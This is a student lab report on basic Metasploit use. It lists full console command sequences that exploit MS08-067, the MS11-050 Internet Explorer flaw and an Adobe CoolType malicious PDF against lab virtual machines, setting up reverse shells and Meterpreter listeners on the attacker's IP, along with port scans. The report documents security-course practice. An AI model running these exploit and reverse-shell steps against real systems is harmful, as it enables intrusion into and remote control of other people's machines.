# 2017-2018-2 20155319 "Network Countermeasure Technology" Exp5: MSF Basic Application

2017-2018-2 20155319 "Network Countermeasure Technology" Exp5: MSF Basic Application

basic question answer

• Explain what is exploit, payload, encode in your own words
• exploit: A process in which users exploit vulnerabilities to attack, which is a vehicle.
• payload: Attack payload, such as backdoor and other attack codes.

• encode: used for encoding, used for camouflage

  practice process record

  1. Windows Service Penetration Attack - MS08-067 Security Vulnerability

  ①攻击机：kali ②靶机：windows XP SP3(English)

  Can be pinged.
  

Enter msfconsole on the attack machine kali to enter the console, and enter the following commands in sequence:

• msf > search ms08-067//Use the search command to search for information about the vulnerability MS08_067
  

• msf >use exploit/windows/smb/ms08_067_netapi

• msf exploit(ms08_067_netapi)> show payloads//View the payload we can use:
  

• msf exploit(ms08_067_netapi)> set payload generic/shell_reverse_tcp//tcp reverse connection
• msf exploit(ms08_067_netapi) > set LHOST 192.168.72.131attacker ip
• msf exploit(ms08_067_netapi)>set LPORT 5319
• msf exploit(ms08_067_netapi)> set RHOST 192.168.72.135//target ip

• msf exploit(ms08_067_netapi)> set target 0//Automatically select the target system type
  

• msf exploit(ms08_067_netapi) >exploit

• success! The results of the attack are as follows:
  

2. Browser Penetration Attack - MS11-050

①攻击机：kali ②靶机：WindowsXP Professional sp2/Windows7专业版 ③IE版本：7.0/8.0

Enter the kali input msfconsoleinto the console of the attack aircraft, and enter the following commands in sequence:

• msf >use windows/browser/ms11_050_mshtml_cobjectelement
• msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http//http reverse link
• msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.72.131//attack machine ip
• msf exploit(ms11_050_cobjectelement) > set LPORT 5319//fixed attack port
• msf exploit(ms11_050_cobjectelement) > set URIPATH rhl19//Uniform resource identifier path setting
• msf exploit(ms11_050_cobjectelement) >exploit

• Successfully get Local ip:
  

• Access http://192.168.72.131:8080/rhl19 with the target drone, a pop-up warning appears:
  

• Try to modify the relevant settings of the IE browser to reduce its security level
  

• The second time I tried to access the above URL in IE, it still failed... very sad...
  

3. Client-side attacks Adobe

①攻击机：kali ②靶机：windowsXP Professional sp2 ③Adobe版本：9.3

Enter msfconsole on the attack machine kali to enter the console, and enter the following commands in sequence:

• msf >use windows/fileformat/adobe_cooltype_sing
• msf exploit(adobe_cooltype_sing) > set payloadwindows/meterpreter/reverse_tcp //tcp reverse connection
• msf exploit(adobe_cooltype_sing) > set LHOST 192.168.72.131//attack machine ip
• msf exploit(adobe_cooltype_sing) > set LPORT 5319//attack port
• msf exploit(adobe_cooltype_sing) > set FILENAME 20155319.pdf//Set the name of the generated pdf file
• msf exploit(adobe_cooltype_sing) > exploit//attack

• The pdf was generated successfully.
  

• Since the generated file is a hidden file, use the copy command to copy it to another directory.
  

• After transferring or copying the pdf file to the target machine, enter back on kali to exit the current module, enter the monitoring module, and enter the following command:

  msf > use exploit/multi/handler //进入监听模块
  msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接
  msf exploit(handler) > set LHOST 192.168.72.131 //攻击机ip
  msf exploit(handler) > set LPORT 5319 //攻击端口固定
  msf exploit(handler) > exploit

• Then open the pdf file on the target machine, and the connection is successful.
  

4. Metasploit - Information Collection Module

1. Scan port

• msf > use auxiliary/scanner/portscan/syn (use portscan module)
• msf auxiliary(syn) > show options
• msf auxiliary(syn) > set RHOSTS 192.168.72.137 (target)
• msf auxiliary(syn) > set THREADS 50 (threads)
• msf auxiliary(syn) > Exploit
  terminated early due to long scan time.
  

2. Scan the TCP port usage of the target machine

• Enter the following commands:
  

• run to open the scan, you can see the usage of all tcp ports on the winxp target machine

  Practice summary and experience

  There is nothing particularly difficult in this experiment. It is mainly in the configuration of the environment. I have configured it myself for a long time but it is still unsuccessful. Finally, I copied the configured virtual machine. Experienced the specificity of metasploit attack vulnerabilities, and has detailed requirements for operating systems and software versions. It must be successful under certain circumstances and under certain trigger conditions. Feel the gap between practice and real attack.